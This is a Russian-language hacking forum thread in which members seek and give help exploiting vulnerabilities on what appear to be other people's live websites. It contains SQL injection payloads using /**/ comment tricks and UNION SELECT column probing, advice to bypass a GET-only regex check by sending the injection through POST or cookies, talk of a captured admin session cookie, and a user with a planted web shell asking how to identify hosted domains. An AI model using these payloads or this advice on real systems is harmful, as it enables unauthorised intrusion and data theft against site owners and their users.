Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    Отписал тебе в приват.
     
  2. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    Привет. Есть уязвимость формата http://domain/'sp%20ace
    Ответ:
    Code:
    Database error: Invalid SQL: select * from elementpath where path='/'sp%20ace'
    MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sp%20ace'' at line 1)
    Session halted.
    Проблема в том, что %20, + не преобразовываются обратно в пробелы. Можно ли такое обойти? Спасибо
     
  3. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    заюзай /**/
     
  4. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    тебе в другой раздел, тут вопросы по уязвимостям, а тебе в раздел "О работе"..предлагай цену и может кто и откликнется..
     
  5. Ottiko

    Ottiko New Member

    Joined:
    14 Sep 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Через софт поимал вроде куки авторизации пользователя (может админ :rolleyes: )

    Это что нибудь даст, или мелочь?

    Ещё чита тему Xss для новичков только не очень разобрался...
     
    #14345 Ottiko, 3 Aug 2010
    Last edited: 3 Aug 2010
  6. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Это ничего не даст.
     
  7. Ottiko

    Ottiko New Member

    Joined:
    14 Sep 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Так вроде сканер нашол XSS уязвимость...

    Или я путаю... :(
     
    #14347 Ottiko, 3 Aug 2010
    Last edited: 3 Aug 2010
  8. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Я про куки. Эти куки ничего не дадут.
     
  9. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    155
    Likes Received:
    12
    Reputations:
    0
    есть шелл на нем лежит несколько сайтов, но папки с сайтами в виде логинов без домена...

    Есть какой-нибудь простой способ спалить домены?
     
  10. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    Конфиг апача.
     
  11. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    Спасибо за идею, я правильно понял?
    Code:
    http://domain/'/**/union/**/select/**/1,2,3#comment
    выводит
    Code:
    Database error: Invalid SQL: select * from elementpath where path='/'/**/union/**/select/**/1,2,3'
    MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)
    Session halted.
     
  12. XENON4IK

    XENON4IK Elder - Старейшина

    Joined:
    22 Apr 2007
    Messages:
    135
    Likes Received:
    62
    Reputations:
    15
    Помогите с анализом кода. в нём есть скуля? если есть как её заюзать?
    PHP:
    <?php
    if (preg_match('/^\d{3}$/',$_GET["id"]))
    {
        
    $link mysql_connect()
            or die(
    "not connect: ".mysql_error());
        
    mysql_select_db("db1")
            or die(
    "not select database: ".mysql_error());
        
    $sq="select name from user where id ='$id'";
        
    $q=mysql_query($sq);
        if((
    $e=mysql_error())<>'')
        {
            echo 
    "error sql";
            
    Header("Location:client.php");
        }
        if (
    mysql_num_rows($q) == )     Header("Location:client.php?e=1");
        else
        {    
            while(
    $r=mysql_fetch_row($q))
            {    
                print 
    "Здраствуйте уважаемый(ая), ";        
                
    $i 0;        
                while ((
    mysql_num_fields($q) - $i) != 0)
                {
                    echo 
    "$r[$i]<br>";
                    
    $i += 1;
                }
            }
        }
        
    mysql_close($link);
    }
    else     
    {
        
    Header("Location:error.php");
    }
        
    ?>
     
  13. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    больше нет чем да, я просто хз есть ли баги в самой функции preg_match, но их вроде нет
     
    #14353 Seravin, 4 Aug 2010
    Last edited: 4 Aug 2010
  14. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    #comment - это ты так коментишь прям в браузере?

    Если да, то попробуй так /*

    Ещё стоит мне кажется что нибудь перед UNION написать типа
    domain/test'/**/union ....
     
  15. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    roddik, попробуй http://domain/'/**/union/**/select/**/1,2,3/*
    т.е. в конце комментарий повешай

    XENON4IK, т.к. в строчке $sq="select name from user where id ='$id'"; запрашивается просто $id то в строке адреса укажи нормальный id(например 321), а в POST запросе посылай инъекцию, или в COOKIE т.к. и пост и куки перебивают массив GET, а проверка идет только на ГЕТ.


    Seravin, где ты вообще preg_replace увидел?
     
    1 person likes this.
  16. tompson_

    tompson_ New Member

    Joined:
    1 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    есть скуля вида

    последняя кавычка учитывается в запросе в любом случае и вариант
    [inj] = ' union select 1,2,3--
    не прокатывает. не только --, но и /* /**/ ; никакие комментарии не работают. в итоге если
    [inj] = 'order by 1--
    выводит
    я подобрал количество столбцов запросом, где
    [inj] = '+union+select+1,2,3,'
    получилось

    но в скрипте идет следующий запрос, который выдает ошибку

    можно ли обойти UPDATE и как это сделать?
     
  17. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Линк на скулю дай.
     
  18. roddik

    roddik Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    13
    Reputations:
    0
    Попробовал в дбмс это все вбить, оказалось, что подобные комментарии заменяются на пустую строку - получается вида unionselect1,2, то есть одним словом, так что такие манипуляции с комментариями не сработают. Могу дать линк в ПМ, единственное, чего я хочу - это чтобы мне потом кто-то объяснил, как это можно было раскрутить
     
  19. kfor

    kfor Elder - Старейшина

    Joined:
    1 Sep 2005
    Messages:
    278
    Likes Received:
    48
    Reputations:
    29

    Это не коментарии, а один из способов разделения запроса. Скорее всего там стоит прег реплейс который заменяет ненужные символы.
     
  20. AGIMI777

    AGIMI777 Banned

    Joined:
    1 Jul 2010
    Messages:
    98
    Likes Received:
    1
    Reputations:
    0
    Fatal error: require() [function.require]: Failed opening required 'info//var/www/web6/web/index.php' (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/web6/web/index.php on line 45

    что далше????????????
     
Thread Status:
Not open for further replies.